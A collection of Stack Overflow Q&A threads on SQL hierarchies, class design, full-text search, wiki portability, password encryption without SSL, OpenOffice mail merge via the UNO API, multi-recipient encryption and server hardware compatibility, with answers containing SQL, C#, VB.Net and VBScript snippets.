*http://www.sitepoint.com/article/hierarchical-data-database
*Managing Hierarchical Data in MySQL
*http://www.evolt.org/article/Four_ways_to_work_with_hierarchical_data/17/4047/index.html
Here are some more links that I've collected:
*
*http://en.wikipedia.org/wiki/Tree_%28data_structure%29
*http://en.wikipedia.org/wiki/Category:Trees_%28structure%29
adjacency list model
*
*http://www.sqlteam.com/item.asp?ItemID=8866
nested set
*
*http://www.sqlsummit.com/AdjacencyList.htm
*http://www.edutech.ch/contribution/nstrees/index.php
*http://www.phpriot.com/d/articles/php/application-design/nested-trees-1/
*http://www.dbmsmag.com/9604d06.html
*http://en.wikipedia.org/wiki/Tree_traversal
*http://www.cosc.canterbury.ac.nz/mukundan/dsal/BTree.html (applet java montrant le fonctionnement )
Graphes
*
*http://www.artfulsoftware.com/mysqlbook/sampler/mysqled1ch20.html
Classes :
Nested Sets DB Tree Adodb
*
*http://www.phpclasses.org/browse/package/2547.html
Visitation Model ADOdb
*
*http://www.phpclasses.org/browse/package/2919.html
PEAR::DB_NestedSet
*
*http://pear.php.net/package/DB_NestedSet
*utilisation : https://www.entwickler.com/itr/kolumnen/psecom,id,26,nodeid,207.html
PEAR::Tree
*
*http://pear.php.net/package/Tree/download/0.3.0/
*http://www.phpkitchen.com/index.php?/archives/337-PEARTree-Tutorial.html
nstrees
*
*http://www.edutech.ch/contribution/nstrees/index.php
A: Oracle: SELECT ... START WITH ... CONNECT BY
Oracle has an extension to SELECT that allows easy tree-based retrieval. Perhaps SQL Server has some similar extension?
This query will traverse a table where the nesting relationship is stored in parent and child columns.
select * from my_table
start with parent = :TOP
connect by prior child = parent;
http://www.adp-gmbh.ch/ora/sql/connect_by.html
A: I prefer a mix of the techinques used by Josh and Mark Harrison:
Two tables, one with the data of the Person and other with the hierarchichal info (person_id, parent_id [, mother_id]) if the PK of this table is person_id, you have a simple tree with only one parent by node (which makes sense in this case, but not in other cases like accounting accounts)
This hiarchy table can be transversed by recursive procedures or if your DB supports it by sentences like SELECT... BY PRIOR (Oracle).
Other posibility is if you know the max deep of the hierarchy data you want to mantain is use a single table with a set of columns per level of hierarchy
A: The definitive pieces on this subject have been written by Joe Celko, and he has worked a number of them into a book called Joe Celko's Trees and Hierarchies in SQL for Smarties.
He favours a technique called directed graphs. An introduction to his work on this subject can be found here
A: What's the best way to represent a hierachy in a SQL database? A generic, portable technique?
Let's assume the hierachy is mostly read, but isn't completely static. Let's say it's a family tree.
Here's how not to do it:
create table person (
person_id integer autoincrement primary key,
name varchar(255) not null,
dob date,
mother integer,
father integer
);
And inserting data like this:
person_id name dob mother father
1 Pops 1900/1/1 null null
2 Grandma 1903/2/4 null null
3 Dad 1925/4/2 2 1
4 Uncle Kev 1927/3/3 2 1
5 Cuz Dave 1953/7/8 null 4
6 Billy 1954/8/1 null 3
Instead, split your nodes and your relationships into two tables.
create table person (
person_id integer autoincrement primary key,
name varchar(255) not null,
dob date
);
create table ancestor (
ancestor_id integer,
descendant_id integer,
distance integer
);
Data is created like this:
person_id name dob
1 Pops 1900/1/1
2 Grandma 1903/2/4
3 Dad 1925/4/2
4 Uncle Kev 1927/3/3
5 Cuz Dave 1953/7/8
6 Billy 1954/8/1
ancestor_id descendant_id distance
1 1 0
2 2 0
3 3 0
4 4 0
5 5 0
6 6 0
1 3 1
2 3 1
1 4 1
2 4 1
1 5 2
2 5 2
4 5 1
1 6 2
2 6 2
3 6 1
you can now run arbitary queries that don't involve joining the table back on itself, which would happen if you have the heirachy relationship in the same row as the node.
Who has grandparents?
select * from person where person_id in
(select descendant_id from ancestor where distance=2);
All your descendants:
select * from person where person_id in
(select descendant_id from ancestor
where ancestor_id=1 and distance>0);
Who are uncles?
select decendant_id uncle from ancestor
where distance=1 and ancestor_id in
(select ancestor_id from ancestor
where distance=2 and not exists
(select ancestor_id from ancestor
where distance=1 and ancestor_id=uncle)
)
You avoid all the problems of joining a table to itself via subqueries, a common limitation is 16 subsuqeries.
Trouble is, maintaining the ancestor table is kind of hard - best done with a stored procedure.
A: I've got to disagree with Josh. What happens if you're using a huge hierarchical structure like a company organization. People can join/leave the company, change reporting lines, etc... Maintaining the "distance" would be a big problem and you would have to maintain two tables of data.
This query (SQL Server 2005 and above) would let you see the complete line of any person AND calculates their place in the hierarchy and it only requires a single table of user information. It can be modified to find any child relationship.
--Create table of dummy data
create table #person (
personID integer IDENTITY(1,1) NOT NULL,
name varchar(255) not null,
dob date,
father integer
);
INSERT INTO #person(name,dob,father)Values('Pops','1900/1/1',NULL);
INSERT INTO #person(name,dob,father)Values('Grandma','1903/2/4',null);
INSERT INTO #person(name,dob,father)Values('Dad','1925/4/2',1);
INSERT INTO #person(name,dob,father)Values('Uncle Kev','1927/3/3',1);
INSERT INTO #person(name,dob,father)Values('Cuz Dave','1953/7/8',4);
INSERT INTO #person(name,dob,father)Values('Billy','1954/8/1',3);
DECLARE @OldestPerson INT;
SET @OldestPerson = 1; -- Set this value to the ID of the oldest person in the family
WITH PersonHierarchy (personID,Name,dob,father, HierarchyLevel) AS
(
SELECT
personID
,Name
,dob
,father,
1 as HierarchyLevel
FROM #person
WHERE personID = @OldestPerson
UNION ALL
SELECT
e.personID,
e.Name,
e.dob,
e.father,
eh.HierarchyLevel + 1 AS HierarchyLevel
FROM #person e
INNER JOIN PersonHierarchy eh ON
e.father = eh.personID
)
SELECT *
FROM PersonHierarchy
ORDER BY HierarchyLevel, father;
DROP TABLE #person;
A: We had the same issue when we implemented a tree component for [fleXive] and used the nested set tree model approach mentioned by tharkun from the MySQL docs.
In addition to speed things (dramatically) up we used a spreaded approach which simply means we used the maximum Long value for the top level right bounds which allows us to insert and move nodes without recalculating all left and right values. Values for left and right are calculated by dividing the range for a node by 3 und use the inner third as bounds for the new node.
A java code example can be seen here.
A: If you're using SQL Server 2005 then this link explains how to retrieve hierarchical data.
Common Table Expressions (CTEs) can be your friends once you get comfortable using them.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38801",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "48"
} |
Q: Which class design is better? Which class design is better and why?
public class User
{
public String UserName;
public String Password;
public String FirstName;
public String LastName;
}
public class Employee : User
{
public String EmployeeId;
public String EmployeeCode;
public String DepartmentId;
}
public class Member : User
{
public String MemberId;
public String JoinDate;
public String ExpiryDate;
}
OR
public class User
{
public String UserId;
public String UserName;
public String Password;
public String FirstName;
public String LastName;
}
public class Employee
{
public User UserInfo;
public String EmployeeId;
public String EmployeeCode;
public String DepartmentId;
}
public class Member
{
public User UserInfo;
public String MemberId;
public String JoinDate;
public String ExpiryDate;
}
A: You can also think of Employee as a role of the User (Person). The role of a User can change in time (user can become unemployed) or User can have multiple roles at the same time.
Inheritance is much better when there is real "is a" relation, for example Apple - Fruit. But be very careful: Circle - Ellipse is not real "is a" relation, because cirlce has less "freedom" than ellipse (circle is a state of ellipse) - see: Circle Ellipse problem.
A: The question is simply answered by recognising that inheritance models an "IS-A" relationship, while membership models a "HAS-A" relationship.
*
*An employee IS A user
*An employee HAS A userinfo
Which one is correct? This is your answer.
A: The real questions are:
*
*What are the business rules and user stories behind a user?
*What are the business rules and user stories behind an employee?
*What are the business rules and user stories behind a member?
These can be three completely unrelated entities or not, and that will determine whether your first or second design will work, or if another completely different design is in order.
A: Neither one is good. Too much mutable state. You should not be able to construct an instance of a class that is in an invalid or partially initialized state.
That said, the second one is better because it favours composition over inheritance.
A: Stating your requirement/spec might help arrive at the 'best design'.
Your question is too 'subject-to-reader-interpretation' at the moment.
A: I don't like either one. What happens when someone is both a member and an employee?
A: Here's a scenario you should think about:
Composition (the 2nd example) is preferable if the same User can be both an Employee and a Member. Why? Because for two instances (Employee and Member) that represent the same User, if User data changes, you don't have to update it in two places. Only the User instance contains all the User information, and only it has to be updated. Since both Employee and Member classes contain the same User instance, they will automatically both contain the updated information.
A: Ask yourself the following:
*
*Do you want to model an Employee IS a User? If so, chose inheritance.
*Do you want to model an Employee HAS a User information? If so, use composition.
*Are virtual functions involved between the User (info) and the Employee? If so, use inheritance.
*Can an Employee have multiple instances of User (info)? If so, use composition.
*Does it make sense to assign an Employee object to a User (info) object? If so, use inheritance.
In general, strive to model the reality your program simulates, under the constraints of code complexity and required efficiency.
A: Nice question although to avoid distractions about right and wrong I'd consider asking for the pros and cons of each approach -- I think that's what you meant by which is better or worse and why. Anyway ....
The First Approach aka Inheritance
Pros:
*
*Allows polymorphic behavior.
*Is initially simple and convenient.
Cons:
*
*May become complex or clumsy over time if more behavior and relations are added.
The Second Approach aka Composition
Pros:
*
*Maps well to non-oop scenarios like relational tables, structured programing, etc
*Is straightforward (if not necessarily convenient) to incrementally extend relations and behavior.
Cons:
*
*No polymorphism therefore it's less convenient to use related information and behavior
Lists like these + the questions Jon Limjap mentioned will help you make decisions and get started -- then you can find what the right answers should have been ;-)
A: I don't think composition is always better than inheritance (just usually). If Employee and Member really are Users, and they are mutually exclusive, then the first design is better. Consider the scenario where you need to access the UserName of an Employee. Using the second design you would have:
myEmployee.UserInfo.UserName
which is bad (law of Demeter), so you would refactor to:
myEmployee.UserName
which requires a small method on Employee to delegate to the User object. All of which is avoided by the first design.
A: Three more options:
*
*Have the User class contain the supplemental information for both employees and members, with unused fields blank (the ID of a particular User would indicate whether the user was an employee, member, both, or whatever).
*Have an User class which contains a reference to an ISupplementalInfo, where ISupplementalInfo is inherited by ISupplementalEmployeeInfo, ISupplementalMemberInfo, etc. Code which is applicable to all users could work with User class objects, and code which had a User reference could get access to a user's supplemental information, but this approach would avoid having to change User if different combinations of supplemental information are required in future.
*As above, but have the User class contain some kind of collection of ISupplementalInfo. This approach would have the advantage of facilitating the run-time addition of properties to a user (e.g. because a Member got hired). When using the previous approach, one would have to define different classes for different combinations of properties; turning a "member" into a "member+customer" would require different code from turning an "employee" into an "employee+customer". The disadvantage of the latter approach is that it would make it harder to guard against redundant or inconsistent attributes (using something like a Dictionary<Type, ISupplementalInfo> to hold supplemental information could work, but would seem a little "bulky").
I would tend to favor the second approach, in that it allows for future expansion better than would direct inheritance. Working with a collection of objects rather than a single object might be slightly burdensome, but that approach may be better able than the others to handle changing requirements.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38820",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "45"
} |
Q: Best full text search alternative to MS SQL, C++ solution What is the best full text search alternative to Microsoft SQL? (which works with MS SQL)
I'm looking for something similar to Lucene and Lucene.NET but without the .NET and Java requirements. I would also like to find a solution that is usable in commercial applications.
A: Sphinx is one of the best solutions. It's written in C++ and has amazing performance.
A: Take a look at CLucene - It's a well maintained C++ port of java Lucene. It's currently licenced under LGPL and we use it in our commercial application.
Performance is incredible, however you do have to get your head around some of the strange API conventions.
A: DT Search is hands down the best search tool I have used. They have a number of solutions available. Their Engine will run on Native Win32, Linux or .NET. It will index pretty much every kind of document you might have (Excel, PDF, Word, etc.) I did some benchmarks comparisons a while ago and it was the easiest to use and had the best performance.
A: Solr is based on Lucene, but accessible via HTTP, so it can be used from any platform.
A: I second Sphinx, but Lucene is also not so bad despite the Java. :) If you are not dealing with too much data spread out etc., then also look into MySQL's FULLTEXT. We are using it to search across a 20 GB database.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38822",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Is Wiki Content Portable? I'm thinking of starting a wiki, probably on a low cost LAMP hosting account. I'd like the option of exporting my content later in case I want to run it on IIS/ASP.NET down the line. I know in the weblog world, there's an open standard called BlogML which will let you export your blog content to an XML based format on one site and import it into another. Is there something similar with wikis?
A: The correct answer is ... "it depends".
It depends on which wiki you're using or planning to use. I've used various over the years MoinMoin was ok, used files rather than database, Ubuntu seem to like it. MediaWiki, everyone knows about and JAMWiki is a java clone(ish) of MediaWiki with the aim to be markup compatible with MediaWiki, both use databases and you can generally connect whichever database you want, JAMWiki is pre-configured to use an internal HSQLDB instance.
I recently converted about 80 pages from a MoinMoin wiki into JAMWiki pages and this was probably 90% handled by a tiny perl script I found somewhere (I'll provide a link if I can find it again). The other 10% was unfortunately a by-hand experience (they were of the utmost importance with them being recipies for the missus) ;-)
I also recently setup a Mediawiki instance for work and that took all of about 8 minutes to do. So that'd be my choice.
A: To answer your question I don't believe that there's such a standard as WikiML as Till called it.
As strange as it sounds, I've investigated screen scraping a wiki for a co-worker to help him port it to another wiki engine. It turned out that screen scraping would have been easier, quicker and more efficient to write to move this particular file based wiki to another one or a CMS.
Given the context that you wrote the question in I would bite the bullet now and pay the little extra for a windows hosted account and put Screwturn wiki on it. You're got the option of using file based or SQL Server based back end for it but because one of your requirements is low cost I'm guessing that you would use file based now for a cheaper hosted account and then you can always upscale the back end to SQL Server.
A: I haven't heard of WikiML.
I think your biggest obstacle is gonna be converting one wiki markup to another. For example, some wikis use markdown (which is what Stack Overflow uses), others use another markup syntax (e.g. BBCode, ...), etc.. The bottom line is - assuming the contents are databased it's not impossible to export and parse it to make it "fit" in another system. It might just be a pain in the ass.
And if the contents are not databased, it's gonna be a royal pain in the ass. :D
Another solution would be to stay with the same system. I am not sure what the reason is for changing the technology later on. It's not like a growing project requires IIS/ASP.NET all of the sudden. (It might just be the other way around.) But for example, if you could stick with PHP for a while, you could also run that on IIS.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38824",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Two-way password encryption without ssl I am using the basic-auth twitter API (no longer available) to integrate twitter with my blog's commenting system. The problem with this and many other web APIs out there is that they require the user's username and password to do anything useful. I don't want to deal with the hassle and cost of installing a SSL certificate, but I also don't want passwords passed over the wire in clear text.
I guess my general question is: How can I send sensitive data over an insecure channel?
This is my current solution and I'd like to know if there are any holes in it:
*
*Generate a random key on the server (I'm using php).
*Save the key in a session and also output the key in a javascript variable.
*On form submit, use Triple DES in javascript with the key to encrypt the password.
*On the server, decrypt the password using the key from the session and then destroy the session.
The end result is that only the encrypted password is sent over the wire and the key is only used once and never sent with the password. Problem solved?
A: You don't have to have a certificate on your server; it's up to the client whether they are willing to talk to an unauthenticated server. Key agreement can still be performed to establish a private channel. It wouldn't be safe to send private credentials to an unauthenticated server though, which is why you don't see SSL used this way in practice.
To answer your general question: you just send it. I think your real general question is: “How do I send sensitive data over an insecure channel—and keep it secure?” You can't.
It sounds like you've decided that security isn't worth the $10–20 per month a certificate would cost, and to protect Twitter passwords, that's probably true. So, why spend time to provide the illusion of security? Just make it clear to your users that their password will be sent in the clear and let them make their own choice.
A:
*
*Generate a random key on the server (I'm using php).
*Save the key in a session and also output the key in a javascript variable.
*On form submit, use Triple DES in javascript with the key to encrypt the password.
This avoids sending the password in the clear over the wire, but it requires you to send the key in the clear over the wire, which would allow anyone eavesdropping to decode the password.
It's been said before and I'll say it again: don't try to make up your own cryptographic protocols! There are established protocols out there for this kind of thing that have been created, peer reviewed, beat on, hacked on, poked and prodded by professionals, use them! No one person is going to be able to come up with something better than the entire cryptographic and security community working together.
A: So how is this any more secure? Even though you might have secured browser<>your server, what about the rest of the Internet (your server<>twitter)?
IMHO, it's unacceptable to ask for a username and password of another service and expect people to enter that. And if you care that much - don't integrate them until they get their act straight and re-enable OAuth. (They supported it for a while, but disabled it a few months ago.)
In the mean time, why not offer OpenID? Every Google, Yahoo!, VOX etc. account has one. People might not be aware of it but chances are really, really high that they already have OpenID. Check this list to see what I mean.
A: When the key is sent between the client and the server it is clear text and subject to interception. Combine that with the encrypted text of the password and the password is decrypted.
Diffie-Hellman is a good solution. If you only need to authenticate them, and not actually transmit the password (because the password is already stored on the server) then you can use HTTP Digest Authentication, or some variation there of.
A: APIs and OAuth
Firstly, as others have said, you shouldn't be using a user's password to access the API, you should be getting an OAuth token. This will allow you to act on that user's behalf without needing their password. This is a common approach used by many APIs.
Key Exchange
If you need to solve the more general problem of exchanging information over insecure connections, there are several key exchange protocols as mentioned by other answers.
In general key exchange algorithms are secure from eavesdroppers, but because they do not authenticate the identity of the users, they are vulnerable to man-in-the-middle attacks.
From the Wikipedia page on Diffie Hellman:
In the original description, the
Diffie–Hellman exchange by itself does not provide authentication of
the communicating parties and is thus vulnerable to a
man-in-the-middle attack. A person in the middle may establish two
distinct Diffie–Hellman key exchanges, one with Alice and the other
with Bob, effectively masquerading as Alice to Bob, and vice versa,
allowing the attacker to decrypt (and read or store) then re-encrypt
the messages passed between them. A method to authenticate the
communicating parties to each other is generally needed to prevent
this type of attack. Variants of Diffie-Hellman, such as STS, may be
used instead to avoid these types of attacks.
Even STS is insecure in some cases where an attacker is able to insert their own identity (signing key) in place of either the sender or receiver.
Identity and Authentication
This is exactly the problem SSL is designed to solve, by establishing a hierarchy of 'trusted' signing authorities which have in theory verified who owns a domain name, etc, someone connecting to a website can verify that they are indeed communicating with that domain's server, and not with a man-in-the-middle who has placed themselves in between.
You can create a self-signed certificate which will provide the necessary configuration to encrypt the connection, but will not protect you from man in the middle attacks for the same reason that unauthenticated Diffie-Hellman key exchange will not.
You can get free SSL certificates valid for 1 year from https://www.startssl.com/ - I use them for my personal sites. They're not quite as 'trusted' whatever that means, since they only do automatic checks on people who apply for one, but it's free. There are also services which cost very little (£10/year from 123-Reg in the UK).
A: Your method has a flaw - if someone were to intercept the transmission of the key to the user and the user's encrypted reply they could decrypt the reply and obtain the username/password of the user.
However, there is a way to securely send information over an unsecure medium so long as the information is not capable of being modified in transit known as the Diffie-Hellman algorithm. Basically two parties are able to compute the shared key used to encrypt the data based on their conversations - yet an observer does not have enough information to deduce the key.
Setting up the conversation between the client and the server can be tricky though, and much more time consuming than simply applying SSL to your site. You don't even have to pay for it - you can generate a self-signed certificate that provides the necessary encryption. This won't protect against man-in-the-middle attacks, but neither will the Diffie-Hellman algorithm.
A: I've implemented a different approach
*
*Server: user name and password-hash stored in the database
*Server: send a challenge with the form to request the password, store it in the session with a timestamp and the client's IP address
*Client: hash the password, concat challenge|username|passwordhash, hash it again and post it to the server
*Server: verify timestamp, IP, do the same concatenation/hashing and compare it
This applies to a password transmission. Using it for data means using the final hash as the encryption key for the plain text and generating a random initialization vector transmitted with the cipher text to the server.
Any comments on this?
A: The problem with client-side javascript security is that the attacker can modify the javascript in transit to a simple {return input;} thereby rendering your elaborate security moot. Solution: use browser-provided (ie. not transmitted) RSA. From what I know, not available yet.
A:
How can I send sensitive data over an
insecure channel
With a pre-shared secret key. This is what you attempt in your suggested solution, but you can't send that key over the insecure channel. Someone mentioned DH, which will help you negotiate a key. But the other part of what SSL does is provide authentication, to prevent man-in-the-middle attacks so that the client knows they are negotiating a key with the person they intend to communicate with.
Chris Upchurch's advice is really the only good answer there is for 99.99% of engineers - don't do it. Let someone else do it and use their solution (like the guys who wrote the SSL client/server).
I think the ideal solution here would be to get Twitter to support OpenID and then use that.
A: An ssl certificate that is self-signed doesn't cost money. For a free twitter service, that is probably just fine for users.
A: TO OLI
In your approch for example i'm in the same subnet with same router, so i get the same ip as my collegues in my work. I open same url in browser, so server generates the timestamp with same ip, then i use tcp/ip dump to sniff the hashed or non hashed password from my collegues connection. I can sniff everything he sends. So i have all hashes from his form also you have timestamp(my) and same ip. So i send everything using post tool and hey i'm loggen in.
A: If you don't want to use SSL, why not try some other protocol, such as kerberos?
A basic overview is here:
http://www.kerberos.org/software/tutorial.html
Or if you want to go somewhat more in depth, see
http://www.hitmill.com/computers/kerberos.html
A: I have a similar issue(wanting to encrypt data in forms without paying for an ssl certificate) so I did some hunting and found this project: http://www.jcryption.org/
I haven't used it yet but it looks easy to implement and thought I'd share it here in-case anyone else is looking for something like it and finds themselves on this page like I did.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38838",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: How to do a simple mail merge in OpenOffice I need to do a simple mail merge in OpenOffice using C++, VBScript, VB.Net or C# via OLE or native API. Are there any good examples available?
A: I haven't come up with a solution I'm really happy with but here are some notes:
*
*Q. What is the OO API for mail merge?
A. http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html
*Q. What support groups?
A. http://user.services.openoffice.org/en/forum/viewforum.php?f=20
*Q. Sample code?
A. http://user.services.openoffice.org/en/forum/viewtopic.php?f=20&t=946&p=3778&hilit=mail+merge#p3778
http://user.services.openoffice.org/en/forum/viewtopic.php?f=20&t=8088&p=38017&hilit=mail+merge#p38017
*Q. Any more examples?
A. file:///C:/Program%20Files/OpenOffice.org_2.4_SDK/examples/examples.html (comes with the SDK)
http://www.oooforum.org/forum/viewtopic.phtml?p=94970
*Q. How do I build the examples?
A. e.g., for WriterDemo (C:\Program Files\OpenOffice.org_2.4_SDK\examples\CLI\VB.NET\WriterDemo)
*
*Add references to everything in here: C:\Program Files\OpenOffice.org 2.4\program\assembly
*That is cli_basetypes, cli_cppuhelper, cli_types, cli_ure
*Q. Does OO use the same separate data/document file for mail merge?
A. It allows for a range of data sources including csv files
*Q. Does OO allow you to merge to all the different types (fax, email, new document printer)?
A. You can merge to a new document, print and email
*Q. Can you add custom fields?
A. Yes
*Q. How do you create a new document in VB.Net?
A.
Dim xContext As XComponentContext
xContext = Bootstrap.bootstrap()
Dim xFactory As XMultiServiceFactory
xFactory = DirectCast(xContext.getServiceManager(), _
XMultiServiceFactory)
'Create the Desktop
Dim xDesktop As unoidl.com.sun.star.frame.XDesktop
xDesktop = DirectCast(xFactory.createInstance("com.sun.star.frame.Desktop"), _
unoidl.com.sun.star.frame.XDesktop)
'Open a new empty writer document
Dim xComponentLoader As unoidl.com.sun.star.frame.XComponentLoader
xComponentLoader = DirectCast(xDesktop, unoidl.com.sun.star.frame.XComponentLoader)
Dim arProps() As unoidl.com.sun.star.beans.PropertyValue = _
New unoidl.com.sun.star.beans.PropertyValue() {}
Dim xComponent As unoidl.com.sun.star.lang.XComponent
xComponent = xComponentLoader.loadComponentFromURL( _
"private:factory/swriter", "_blank", 0, arProps)
Dim xTextDocument As unoidl.com.sun.star.text.XTextDocument
xTextDocument = DirectCast(xComponent, unoidl.com.sun.star.text.XTextDocument)
*Q. How do you save the document?
A.
Dim storer As unoidl.com.sun.star.frame.XStorable = DirectCast(xTextDocument, unoidl.com.sun.star.frame.XStorable)
arProps = New unoidl.com.sun.star.beans.PropertyValue() {}
storer.storeToURL("file:///C:/Users/me/Desktop/OpenOffice Investigation/saved doc.odt", arProps)
*Q. How do you Open the document?
A.
Dim xComponent As unoidl.com.sun.star.lang.XComponent
xComponent = xComponentLoader.loadComponentFromURL( _
"file:///C:/Users/me/Desktop/OpenOffice Investigation/saved doc.odt", "_blank", 0, arProps)
*Q. How do you initiate a mail merge in VB.Net?
A.
*
*Don't know. This functionality is in the API reference but is missing from the IDL. We may be slightly screwed. Assuming the API was working, it looks like running a merge is fairly simple.
*In VBScript:
Set objServiceManager = WScript.CreateObject("com.sun.star.ServiceManager")
'Now set up a new MailMerge using the settings extracted from that doc
Set oMailMerge = objServiceManager.createInstance("com.sun.star.text.MailMerge")
oMailMerge.DocumentURL = "file:///C:/Users/me/Desktop/OpenOffice Investigation/mail merged.odt"
oMailMerge.DataSourceName = "adds"
oMailMerge.CommandType = 0 ' http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html#CommandType
oMailMerge.Command = "adds"
oMailMerge.OutputType = 2 ' http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html#OutputType
oMailMerge.execute(Array())
*In VB.Net (Option Strict Off)
Dim t_OOo As Type
t_OOo = Type.GetTypeFromProgID("com.sun.star.ServiceManager")
Dim objServiceManager As Object
objServiceManager = System.Activator.CreateInstance(t_OOo)
Dim oMailMerge As Object
oMailMerge = t_OOo.InvokeMember("createInstance", _
BindingFlags.InvokeMethod, Nothing, _
objServiceManager, New [Object]() {"com.sun.star.text.MailMerge"})
'Now set up a new MailMerge using the settings extracted from that doc
oMailMerge.DocumentURL = "file:///C:/Users/me/Desktop/OpenOffice Investigation/mail merged.odt"
oMailMerge.DataSourceName = "adds"
oMailMerge.CommandType = 0 ' http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html#CommandType
oMailMerge.Command = "adds"
oMailMerge.OutputType = 2 ' http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html#OutputType
oMailMerge.execute(New [Object]() {})
*The same thing but with Option Strict On (doesn't work)
Dim t_OOo As Type
t_OOo = Type.GetTypeFromProgID("com.sun.star.ServiceManager")
Dim objServiceManager As Object
objServiceManager = System.Activator.CreateInstance(t_OOo)
Dim oMailMerge As Object
oMailMerge = t_OOo.InvokeMember("createInstance", _
BindingFlags.InvokeMethod, Nothing, _
objServiceManager, New [Object]() {"com.sun.star.text.MailMerge"})
'Now set up a new MailMerge using the settings extracted from that doc
oMailMerge.GetType().InvokeMember("DocumentURL", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {"file:///C:/Users/me/Desktop/OpenOffice Investigation/mail merged.odt"})
oMailMerge.GetType().InvokeMember("DataSourceName", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {"adds"})
oMailMerge.GetType().InvokeMember("CommandType", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {0})
oMailMerge.GetType().InvokeMember("Command", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {"adds"})
oMailMerge.GetType().InvokeMember("OutputType", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {2})
oMailMerge.GetType().InvokeMember("Execute", BindingFlags.InvokeMethod Or BindingFlags.IgnoreReturn, Nothing, oMailMerge, New [Object]() {}) ' this line fails with a type mismatch error
A: You should take a look at Apache OpenOffice API. A project for creating an API for Open Office. A few languages they said to support are: C++, Java, Python, CLI, StarBasic, JavaScript and OLE.
Java Example of a mailmerge in OpenOffice.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38842",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: How to encrypt one message for multiple recipients? What are the fundamentals to accomplish data encryption with exactly two keys (which could be password-based), but needing only one (either one) of the two keys to decrypt the data?
For example, data is encrypted with a user's password and his company's password, and then he or his company can decrypt the data. Neither of them know the other password. Only one copy of the encrypted data is stored.
I don't mean public/private key. Probably via symmetric key cryptography and maybe it involves something like XORing the keys together to use them for encrypting.
Update: I would also like to find a solution that does not involve storing the keys at all.
A: Generally speaking, what you do is encrypt the data with a randomly generated key, and then append versions of that random key that have been encrypted with every known key. So anybody with a valid key can discover the 'real' key that was used to encrypt the data.
A: The way this is customarily done is to generate a single symmetric key to encrypt the data. Then you encrypt the symmetric key with each recipient's key or password to that they can decrypt it on their own. S/MIME (actually the Cryptographic Message Syntax on which S/MIME is based) uses this technique.
This way, you only have to store one copy of the encrypted message, but multiple copies of its key.
A: If I understood you correctly, you have some data that you are willing to encrypt and distribute the encryption key splitted into n 'key pieces'.(In your case 2 pieces)
For that you could use the XOR based splitting, here is how it works:
You provide the required number of pieces - n, and the secret key – K. To generate n pieces of your key, you need to create (n – 1) random numbers: R1, R2, R3, . . . , Rn−1. For that you can use a SecureRandom number generator, which will prevent us from duplicates.Then you operate XOR function on these Rn-1 pieces and your key - K:
Rn = R1 ⊕ R2 ⊕ R3 ⊕ . . . ⊕ Rn−1 ⊕ K
Now you have your n pieces: R1, R2, R3, …, Rn-1, Rn and you may destroy the K. Those pieces can be spread in your code or sent to users.
To reassemble the key, we use XOR operation on our Rn pieces:
K = R1 ⊕ R2 ⊕ R3 ⊕ . . . ⊕ Rn−1 ⊕ Rn
With the XOR function (⊕) each piece is inherently important in the reconstruction of the key, if any bits in any of the pieces are changed, then the key is not recoverable.
For more info and code, you can take a look at the Android Utility I wrote for that purpose:
GitHub Project: https://github.com/aivarsda/Secret-Key-Split-Util
Also you can try the Secret Key Splitter demo app which uses that Utility :
GooglePlay: https://play.google.com/store/apps/details?id=com.aivarsda.keysplitter
A: I think I thought of a solution that would work:
D = data to encrypt
h1 = hash(userpassword)
h2 = hash(companyPassword)
k = h1 concat h2
E = function to encrypt
//C is the encrypted data
C = E_h1(h2) concat E_h2(h1) concat E_k(D)
Then either person can decrypt the hash of the other person, and then combine them to decrypt the rest of the data.
Perhaps there is a better solution than this though?
A: In the more general case, a secret (in this application, a decryption key for the data) can be split into shares such that some threshold number of these shares is required to recover the secret. This is known as secret sharing or with n shares and a threshold of t, a (t,n)-threshold scheme.
One way this can be done is by creating a polynomial of order t-1, setting the secret as the first coefficient, and choosing the rest of the coefficients at random. Then, n random points on this curve are selected and become the shares.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38846",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: Will this hardware be 64bit Windows Server 2008 compatible? I recently printed out Jeff Atwood's Understanding The Hardware blog post and plan on taking it to Fry's Electronics and saying to them "Give me all the parts on these sheets so I can put this together." However, I'm going to be installing 64bit Windows Server 2008 on this machine so before I get all the parts:
Will all this hardware be 64bit Server 2008 compatible? - i.e. all drivers available for this hardware for this OS?
A: Hardware's generally pretty OS-agnostic (at least in terms of Windows flavors) these days. Your only concern is getting drivers for other devices (scanners, printers, IR remotes) that won't work on 64bit and/or won't work on "Server" OSes. Online backup software like Mozy generally won't even install on a Server OS, so it depends on what you're going to use it for.
That said, if you're just going to use it for a home machine, then without even looking at the hardware list Jeff put together, I'd be confident in saying it'll probably work just fine.
A: Yes, all that stuff should be fine (motherboard and CPU hardware, motherboard drivers, video card drivers).
A: You have a $1000 operating system license and you're going to put it on ~$1100 worth of hardware purchased at Fry's and presumably put together by yourself?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38861",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
